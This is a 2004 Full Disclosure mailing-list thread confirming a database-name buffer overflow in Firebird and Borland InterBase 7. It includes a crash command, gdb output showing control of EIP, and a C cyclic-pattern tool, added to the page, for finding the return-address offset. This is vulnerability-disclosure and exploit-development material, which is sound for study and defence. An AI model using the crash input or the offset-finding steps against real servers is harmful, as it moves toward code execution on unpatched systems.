Full Disclosure mailing list archives
Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow
From: Noam Rathaus <noamr () beyondsecurity com>
Date: Thu, 3 Jun 2004 13:36:33 +0300
On Thursday 03 June 2004 05:03, KF (lists) wrote:
> Someone that has had some success communicating things security-wise to
> Borland may wish to contact them about this.
>
> [root@CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm
> [kf@CloneRiot bin]$ pwd
> /opt/interbase/bin
> [kf@CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'`
>
> (gdb) c
> Continuing.
> [New Thread 1085279152 (LWP 21355)]
> [New Thread 1095769008 (LWP 21356)]
> [New Thread 1106258864 (LWP 21357)]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread 1085279152 (LWP 21355)]
> 0x41414141 in ?? ()
> (gdb) bt
> #0  0x41414141 in ?? ()
> #1  0x41414141 in ?? ()
> #2  0x41414141 in ?? ()
> ...
> #35 0x41414141 in ?? ()
> #36 0x41414141 in ?? ()
> (gdb)
> (gdb) i r
> eax            0x0         0
> ecx            0x82025e4   136324580
> edx            0x0         0
> ebx            0x81fe29c   136307356
> esp            0x40aff5f8  0x40aff5f8
> ebp            0x41414141  0x41414141
> esi            0x12c       300
> edi            0x40affab8  1085274808
> eip            0x41414141  0x41414141
> eflags         0x10246     66118
> (gdb) x/1s $esp
> 0x40aff5f8:     'A' <repeats 144 times>
>
> [root@CloneRiot interbase]# ./bin/ibserver
> Segmentation fault
>
> -KF
>
> Noam Rathaus wrote:
> > On Sunday 02 June 2002 01:52, KF (lists) wrote:
> > > So is this firebird specific or does it also impact Borland Interbase
> > > users?
> > > -KF
> >
> > We haven't tested Borland's Interbase as we didn't have any installation
> > available for testing. However I can assume that since this vulnerability
> > appears in version 1.0.2, which is of very close resemblance to Borland's
> > Interbase sources, that the vulnerability may also affect it.
Hi,

Well, it appears that the Borland version is a bit more vulnerable, or in
other words more exploitable, as in Firebird I was unable to directly
modify EIP, while it appears that the Borland version's EIP is easily
modifiable.

Thank you for the assistance in verifying whether Borland's Interbase is
also vulnerable.

--
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.
Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
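The gdb session above shows EIP and EBP full of 0x41 and ESI holding 300, which proves control of the return address but not which bytes of the 300-byte database name land there. The usual next step is to replace "A"x300 with a non-repeating pattern and map the crashed register value back to an offset. The tool below is an added example written for this page; it is not code from the thread, from Firebird or from Borland. The only page facts it relies on are the 300-byte length and the `./gsec -database 127.0.0.1:<name>` invocation from KF's post; that gsec passes the name through unchanged before the copy is an assumption.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Metasploit-style cyclic pattern "Aa0Aa1Aa2...Ab0Ab1..." built from
 * (upper, lower, digit) triples.  Every 4-byte window is unique within
 * the first 26*26*10*3 = 20280 bytes, so a register full of pattern
 * bytes maps back to exactly one offset in the input.  The pattern is
 * pure alphanumerics, so it passes through the shell and the
 * "host:name" argument syntax without quoting.
 */
static char pattern_at(size_t idx)
{
    size_t triple = idx / 3;
    switch (idx % 3) {
    case 0:  return "ABCDEFGHIJKLMNOPQRSTUVWXYZ"[(triple / 260) % 26];
    case 1:  return "abcdefghijklmnopqrstuvwxyz"[(triple / 10) % 26];
    default: return "0123456789"[triple % 10];
    }
}

/* Fill out[] with len pattern bytes plus a NUL; out must hold len + 1. */
size_t cyclic_pattern(char *out, size_t len)
{
    for (size_t n = 0; n < len; n++)
        out[n] = pattern_at(n);
    out[len] = '\0';
    return len;
}

/*
 * Map a crashed 32-bit register value (as printed by gdb's "i r") back
 * to the byte offset in a len-byte pattern that produced it.  x86 is
 * little-endian, so the register's low byte is the first byte that was
 * in memory.  Returns -1 if the value did not come from the pattern
 * (0x41414141 from the original "A"x300 run never appears in it).
 */
long pattern_offset(uint32_t reg, size_t len)
{
    unsigned char needle[4] = {
        (unsigned char)(reg & 0xff),
        (unsigned char)((reg >> 8) & 0xff),
        (unsigned char)((reg >> 16) & 0xff),
        (unsigned char)((reg >> 24) & 0xff),
    };
    for (size_t i = 0; i + 4 <= len; i++) {
        int b;
        for (b = 0; b < 4; b++)
            if ((unsigned char)pattern_at(i + b) != needle[b])
                break;
        if (b == 4)
            return (long)i;
    }
    return -1;
}

/*
 * Usage (hypothetical binary name "pattern"):
 *   ./pattern 300              -> prints a 300-byte pattern, a drop-in
 *                                 replacement for `perl -e 'print "A"x300'`
 *   ./pattern 300 0x41306141   -> prints the offset that EIP value came from
 */
int main(int argc, char **argv)
{
    size_t len = argc > 1 ? strtoul(argv[1], NULL, 0) : 300; /* ESI was 300 in the crash */
    if (len > 20280) {
        fprintf(stderr, "pattern is only unique up to 20280 bytes\n");
        return 1;
    }
    if (argc > 2) {
        uint32_t reg = (uint32_t)strtoul(argv[2], NULL, 16);
        long off = pattern_offset(reg, len);
        if (off < 0)
            printf("0x%08x not found in a %zu-byte pattern\n", reg, len);
        else
            printf("0x%08x is at offset %ld\n", reg, off);
        return 0;
    }
    char *buf = malloc(len + 1);
    if (!buf)
        return 1;
    cyclic_pattern(buf, len);
    fputs(buf, stdout);
    free(buf);
    return 0;
}
```

Run the crash again as `./gsec -database 127.0.0.1:$(./pattern 300)` under gdb, then feed the new EIP to `./pattern 300 <eip>` to get the distance from the start of the name to the saved return address; EBP and the bytes at ESP can be mapped the same way to see how much of the name is still intact after the return. An answer of -1 means either the register holds something other than your input or the name was transformed (truncated, upper-cased, path-joined) before the overflowing copy, in which case the pattern has to be adjusted to survive that transformation.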
Current thread:
- Firebird Database Remote Database Name Overflow Aviram Jenik (Jun 01)
- Re: Firebird Database Remote Database Name Overflow KF (lists) (Jun 01)
- Re: Firebird Database Remote Database Name Overflow Noam Rathaus (Jun 02)
- Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow KF (lists) (Jun 02)
- Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow Noam Rathaus (Jun 03)
- Re: Firebird Database Remote Database Name Overflow Noam Rathaus (Jun 02)
- Re: Firebird Database Remote Database Name Overflow KF (lists) (Jun 01)